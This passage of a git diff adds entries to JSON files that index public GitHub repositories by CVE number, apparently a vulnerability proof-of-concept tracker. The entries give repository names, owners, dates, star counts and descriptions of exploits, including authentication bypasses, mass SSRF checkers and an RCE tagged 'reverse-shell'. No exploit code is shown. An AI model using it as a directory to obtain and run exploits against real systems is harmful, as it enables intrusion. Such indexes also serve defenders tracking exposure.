"is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547354997, + "name": "cve-2022-1040", + "full_name": "Keith-amateur\/cve-2022-1040", + "owner": { + "login": "Keith-amateur", + "id": 83109029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83109029?v=4", + "html_url": "https:\/\/github.com\/Keith-amateur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Keith-amateur\/cve-2022-1040", + "description": "Save the trouble to open the burpsuite...", + "fork": false, + "created_at": "2022-10-07T14:44:42Z", + "updated_at": "2022-10-27T18:19:10Z", + "pushed_at": "2022-10-19T14:21:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 559654558, + "name": "CVE-2022-1040", + "full_name": "jackson5sec\/CVE-2022-1040", + "owner": { + "login": "jackson5sec", + "id": 17192323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17192323?v=4", + "html_url": "https:\/\/github.com\/jackson5sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jackson5sec\/CVE-2022-1040", + "description": "This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication", + "fork": false, + "created_at": "2022-10-30T19:20:57Z", + "updated_at": "2024-05-06T09:40:29Z", + "pushed_at": "2022-10-21T07:55:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 586568152, + "name": "CVE-2022-1040", + "full_name": "michealadams30\/CVE-2022-1040", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/CVE-2022-1040", + "description": "Sophos EXploit", + "fork": false, + "created_at": "2023-01-08T15:46:00Z", + "updated_at": "2023-01-08T15:46:00Z", + "pushed_at": "2023-01-08T15:48:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696656893, + "name": "CVE-2022-1040", + "full_name": "Cyb3rEnthusiast\/CVE-2022-1040", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2022-1040", + "description": "New exploitation of 2020 Sophos vuln", + "fork": false, + "created_at": "2023-09-26T07:26:42Z", + "updated_at": "2023-09-26T07:27:10Z", + "pushed_at": "2023-09-26T07:29:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752960539, + "name": "CVE-2022-1040", + "full_name": "xMr110\/CVE-2022-1040", + "owner": { + "login": "xMr110", + "id": 42313754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42313754?v=4", + "html_url": "https:\/\/github.com\/xMr110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMr110\/CVE-2022-1040", + "description": null, + "fork": false, + "created_at": "2024-02-05T07:35:41Z", + "updated_at": "2024-02-05T07:35:42Z", + "pushed_at": "2024-02-05T07:36:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1068.json b/2022/CVE-2022-1068.json new file mode 100644 index 0000000000..25b61fab07 --- /dev/null +++ b/2022/CVE-2022-1068.json @@ -0,0 +1,33 @@ +[ + { + "id": 586786744, + "name": "CVE-2022-1068", + "full_name": "webraybtl\/CVE-2022-1068", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2022-1068", + "description": "Modbus Slave缓冲区溢出漏洞CVE-2022-1068分析与复现", + "fork": false, + "created_at": "2023-01-09T08:23:37Z", + "updated_at": "2023-09-05T10:24:54Z", + "pushed_at": "2023-07-06T06:36:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1096.json b/2022/CVE-2022-1096.json new file mode 100644 index 0000000000..bb5b4d2064 --- /dev/null +++ b/2022/CVE-2022-1096.json @@ -0,0 +1,33 @@ +[ + { + "id": 475602956, + "name": "Chrome-and-Edge-Version-Dumper", + "full_name": "Mav3r1ck0x1\/Chrome-and-Edge-Version-Dumper", + "owner": { + "login": "Mav3r1ck0x1", + "id": 55414177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55414177?v=4", + "html_url": "https:\/\/github.com\/Mav3r1ck0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mav3r1ck0x1\/Chrome-and-Edge-Version-Dumper", + "description": "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096", + "fork": false, + "created_at": "2022-03-29T20:06:33Z", + "updated_at": "2024-08-12T20:21:58Z", + "pushed_at": "2022-03-30T17:59:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1119.json b/2022/CVE-2022-1119.json new file mode 100644 index 0000000000..eeac267376 --- /dev/null +++ b/2022/CVE-2022-1119.json @@ -0,0 +1,33 @@ +[ + { + "id": 519086294, + "name": "CVE-2022-1119", + "full_name": "z92g\/CVE-2022-1119", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-1119", + "description": "WordPress Simple File List FileRead POC", + "fork": false, + "created_at": "2022-07-29T05:04:26Z", + "updated_at": "2023-04-27T05:22:13Z", + "pushed_at": "2022-07-30T08:12:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1162.json b/2022/CVE-2022-1162.json index 1abe6b2615..637d13eb68 100644 --- a/2022/CVE-2022-1162.json +++ b/2022/CVE-2022-1162.json @@ -29,5 +29,36 @@ "watchers": 4, "score": 0, "subscribers_count": 2 + }, + { + "id": 563734755, + "name": "CVE-2022-1162", + "full_name": "ipsBruno\/CVE-2022-1162", + "owner": { + "login": "ipsBruno", + "id": 6839604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4", + "html_url": "https:\/\/github.com\/ipsBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2022-1162", + "description": "A simple tool to enumerate users in gitlab", + "fork": false, + "created_at": "2022-11-09T08:14:28Z", + "updated_at": "2024-11-04T00:36:43Z", + "pushed_at": "2022-11-09T09:30:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1203.json b/2022/CVE-2022-1203.json new file mode 100644 index 0000000000..c9aa6c3faf --- /dev/null +++ b/2022/CVE-2022-1203.json @@ -0,0 +1,33 @@ +[ + { + "id": 674165540, + "name": "CVE-2022-1203", + "full_name": "RandomRobbieBF\/CVE-2022-1203", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-1203", + "description": "Content Mask < 1.8.4 - Subscriber+ Arbitrary Options Update", + "fork": false, + "created_at": "2023-08-03T09:39:15Z", + "updated_at": "2024-08-12T20:32:20Z", + "pushed_at": "2023-08-03T09:43:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1227.json b/2022/CVE-2022-1227.json new file mode 100644 index 0000000000..c36631ea94 --- /dev/null +++ b/2022/CVE-2022-1227.json @@ -0,0 +1,33 @@ +[ + { + "id": 622123920, + "name": "CVE-2022-1227_Exploit", + "full_name": "iridium-soda\/CVE-2022-1227_Exploit", + "owner": { + "login": "iridium-soda", + "id": 32727642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32727642?v=4", + "html_url": "https:\/\/github.com\/iridium-soda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iridium-soda\/CVE-2022-1227_Exploit", + "description": "A script for exploiting CVE-2022-1227", + "fork": false, + "created_at": "2023-04-01T07:28:15Z", + "updated_at": "2024-06-20T08:23:31Z", + "pushed_at": "2023-04-13T12:36:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1292.json b/2022/CVE-2022-1292.json index 11cbe39156..d60aa81b99 100644 --- a/2022/CVE-2022-1292.json +++ b/2022/CVE-2022-1292.json @@ -97,5 +97,67 @@ "watchers": 5, "score": 0, "subscribers_count": 1 + }, + { + "id": 531401741, + "name": "CVE-2022-1292", + "full_name": "greek0x0\/CVE-2022-1292", + "owner": { + "login": "greek0x0", + "id": 104328056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104328056?v=4", + "html_url": "https:\/\/github.com\/greek0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greek0x0\/CVE-2022-1292", + "description": "OpenSSL", + "fork": false, + "created_at": "2022-09-01T07:00:00Z", + "updated_at": "2023-07-06T22:18:33Z", + "pushed_at": "2022-09-01T07:00:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536322502, + "name": "CVE-2022-1292", + "full_name": "und3sc0n0c1d0\/CVE-2022-1292", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/CVE-2022-1292", + "description": "Automation to validate the impact of the vulnerability CVE-2022-1292 on a specific system.", + "fork": false, + "created_at": "2022-09-13T22:01:05Z", + "updated_at": "2024-10-26T07:16:57Z", + "pushed_at": "2022-12-09T06:58:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1329.json b/2022/CVE-2022-1329.json index 9d219b3218..63662560b0 100644 --- a/2022/CVE-2022-1329.json +++ b/2022/CVE-2022-1329.json @@ -97,5 +97,98 @@ "watchers": 4, "score": 0, "subscribers_count": 1 + }, + { + "id": 594762176, + "name": "CVE-2022-1329", + "full_name": "dexit\/CVE-2022-1329", + "owner": { + "login": "dexit", + "id": 6205151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6205151?v=4", + "html_url": "https:\/\/github.com\/dexit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dexit\/CVE-2022-1329", + "description": "The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~\/core\/app\/modules\/onboarding\/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to o CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-29T15:13:34Z", + "updated_at": "2023-02-20T12:39:20Z", + "pushed_at": "2022-12-28T12:11:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818198561, + "name": "CVE-2022-1329", + "full_name": "phanthibichtram12\/CVE-2022-1329", + "owner": { + "login": "phanthibichtram12", + "id": 95855503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95855503?v=4", + "html_url": "https:\/\/github.com\/phanthibichtram12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phanthibichtram12\/CVE-2022-1329", + "description": null, + "fork": false, + "created_at": "2024-06-21T10:05:03Z", + "updated_at": "2024-06-21T10:38:10Z", + "pushed_at": "2024-06-21T10:38:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871297880, + "name": "CVE-2022-1329", + "full_name": "AgustinESI\/CVE-2022-1329", + "owner": { + "login": "AgustinESI", + "id": 73068658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73068658?v=4", + "html_url": "https:\/\/github.com\/AgustinESI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgustinESI\/CVE-2022-1329", + "description": null, + "fork": false, + "created_at": "2024-10-11T16:57:20Z", + "updated_at": "2024-12-20T10:58:12Z", + "pushed_at": "2024-12-20T10:58:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1364.json b/2022/CVE-2022-1364.json new file mode 100644 index 0000000000..b9efe61b91 --- /dev/null +++ b/2022/CVE-2022-1364.json @@ -0,0 +1,33 @@ +[ + { + "id": 722060198, + "name": "cve-2022-1364", + "full_name": "A1Lin\/cve-2022-1364", + "owner": { + "login": "A1Lin", + "id": 22007644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22007644?v=4", + "html_url": "https:\/\/github.com\/A1Lin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A1Lin\/cve-2022-1364", + "description": null, + "fork": false, + "created_at": "2023-11-22T10:55:34Z", + "updated_at": "2024-02-12T08:33:55Z", + "pushed_at": "2023-11-22T11:09:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1386.json b/2022/CVE-2022-1386.json new file mode 100644 index 0000000000..20c410354b --- /dev/null +++ b/2022/CVE-2022-1386.json @@ -0,0 +1,164 @@ +[ + { + "id": 607455905, + "name": "CVE-2022-1386", + "full_name": "ardzz\/CVE-2022-1386", + "owner": { + "login": "ardzz", + "id": 38525912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38525912?v=4", + "html_url": "https:\/\/github.com\/ardzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ardzz\/CVE-2022-1386", + "description": null, + "fork": false, + "created_at": "2023-02-28T02:08:59Z", + "updated_at": "2024-09-21T12:00:44Z", + "pushed_at": "2023-03-09T16:25:57Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609709956, + "name": "fubucker", + "full_name": "im-hanzou\/fubucker", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/fubucker", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF", + "fork": false, + "created_at": "2023-03-05T01:46:41Z", + "updated_at": "2024-06-04T12:12:38Z", + "pushed_at": "2023-03-08T18:25:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "avada", + "checker", + "cve-2022-1386", + "fusion-builder", + "theme-fusion", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 697749113, + "name": "CVE-2022-1386-Mass_Vulnerability", + "full_name": "zycoder0day\/CVE-2022-1386-Mass_Vulnerability", + "owner": { + "login": "zycoder0day", + "id": 31403046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31403046?v=4", + "html_url": "https:\/\/github.com\/zycoder0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zycoder0day\/CVE-2022-1386-Mass_Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-09-28T11:55:43Z", + "updated_at": "2023-09-28T17:30:07Z", + "pushed_at": "2023-09-28T11:56:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 768474131, + "name": "CVE-2022-1386", + "full_name": "satyasai1460\/CVE-2022-1386", + "owner": { + "login": "satyasai1460", + "id": 68277833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68277833?v=4", + "html_url": "https:\/\/github.com\/satyasai1460", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satyasai1460\/CVE-2022-1386", + "description": null, + "fork": false, + "created_at": "2024-03-07T06:35:33Z", + "updated_at": "2024-03-07T14:37:43Z", + "pushed_at": "2024-03-07T06:54:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898463801, + "name": "CVE-2022-1386", + "full_name": "lamcodeofpwnosec\/CVE-2022-1386", + "owner": { + "login": "lamcodeofpwnosec", + "id": 47277287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47277287?v=4", + "html_url": "https:\/\/github.com\/lamcodeofpwnosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lamcodeofpwnosec\/CVE-2022-1386", + "description": "Fusion Builder < 3.6.2 - Unauthenticated SSRF", + "fork": false, + "created_at": "2024-12-04T12:48:53Z", + "updated_at": "2024-12-04T12:51:24Z", + "pushed_at": "2024-12-04T12:51:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1388.json b/2022/CVE-2022-1388.json index b75ed3580c..8ced2a85e8 100644 --- a/2022/CVE-2022-1388.json +++ b/2022/CVE-2022-1388.json @@ -1575,5 +1575,551 @@ "watchers": 3, "score": 0, "subscribers_count": 1 + }, + { + "id": 509548569, + "name": "CVE-2022-1388_refresh", + "full_name": "Luchoane\/CVE-2022-1388_refresh", + "owner": { + "login": "Luchoane", + "id": 40374879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40374879?v=4", + "html_url": "https:\/\/github.com\/Luchoane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luchoane\/CVE-2022-1388_refresh", + "description": "PoC for exploiting CVE-2022-1388 on BIG IP F5", + "fork": false, + "created_at": "2022-07-01T18:08:50Z", + "updated_at": "2022-07-07T19:22:09Z", + "pushed_at": "2022-07-01T20:04:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510239425, + "name": "CVE-2022-1388", + "full_name": "jbharucha05\/CVE-2022-1388", + "owner": { + "login": "jbharucha05", + "id": 13020621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13020621?v=4", + "html_url": "https:\/\/github.com\/jbharucha05", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbharucha05\/CVE-2022-1388", + "description": "CVE-2022-1388, bypassing iControl REST authentication", + "fork": false, + "created_at": "2022-07-04T06:31:56Z", + "updated_at": "2022-07-04T07:08:22Z", + "pushed_at": "2022-07-04T10:37:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "f5-big-ip-icontrol-rest-rce", + "f5-bigip" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557286411, + "name": "CVE-2022-1388", + "full_name": "On-Cyber-War\/CVE-2022-1388", + "owner": { + "login": "On-Cyber-War", + "id": 114944421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114944421?v=4", + "html_url": "https:\/\/github.com\/On-Cyber-War", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/On-Cyber-War\/CVE-2022-1388", + "description": "cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE", + "fork": false, + "created_at": "2022-10-25T12:15:31Z", + "updated_at": "2022-10-25T12:15:31Z", + "pushed_at": "2022-10-25T12:23:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557293075, + "name": "CVE-2022-1388", + "full_name": "forktheplanet\/CVE-2022-1388", + "owner": { + "login": "forktheplanet", + "id": 61333042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61333042?v=4", + "html_url": "https:\/\/github.com\/forktheplanet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forktheplanet\/CVE-2022-1388", + "description": "cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE", + "fork": false, + "created_at": "2022-10-25T12:29:54Z", + "updated_at": "2023-08-14T21:05:37Z", + "pushed_at": "2023-05-19T05:55:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 572343924, + "name": "CVE-2022-1388", + "full_name": "revanmalang\/CVE-2022-1388", + "owner": { + "login": "revanmalang", + "id": 91707288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91707288?v=4", + "html_url": "https:\/\/github.com\/revanmalang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revanmalang\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-11-30T04:06:56Z", + "updated_at": "2022-12-16T12:56:47Z", + "pushed_at": "2022-11-30T04:07:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575059061, + "name": "CVE-2022-1388", + "full_name": "amitlttwo\/CVE-2022-1388", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-12-06T16:59:56Z", + "updated_at": "2023-02-07T11:10:10Z", + "pushed_at": "2023-02-07T11:02:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 576167094, + "name": "CVE-2022-1388", + "full_name": "M4fiaB0y\/CVE-2022-1388", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-1388", + "description": "Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)", + "fork": false, + "created_at": "2022-12-09T06:51:21Z", + "updated_at": "2022-12-09T06:52:56Z", + "pushed_at": "2022-12-09T06:51:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580855703, + "name": "CVE-2022-1388", + "full_name": "devengpk\/CVE-2022-1388", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-12-21T16:11:48Z", + "updated_at": "2023-07-06T22:42:46Z", + "pushed_at": "2022-12-21T17:35:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581717116, + "name": "CVE-2022-1388", + "full_name": "vaelwolf\/CVE-2022-1388", + "owner": { + "login": "vaelwolf", + "id": 58718722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58718722?v=4", + "html_url": "https:\/\/github.com\/vaelwolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vaelwolf\/CVE-2022-1388", + "description": "-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red teams", + "fork": false, + "created_at": "2022-12-24T03:59:24Z", + "updated_at": "2024-04-08T13:11:02Z", + "pushed_at": "2022-12-25T02:43:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "exploit", + "pcap", + "reverse-shell" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627124485, + 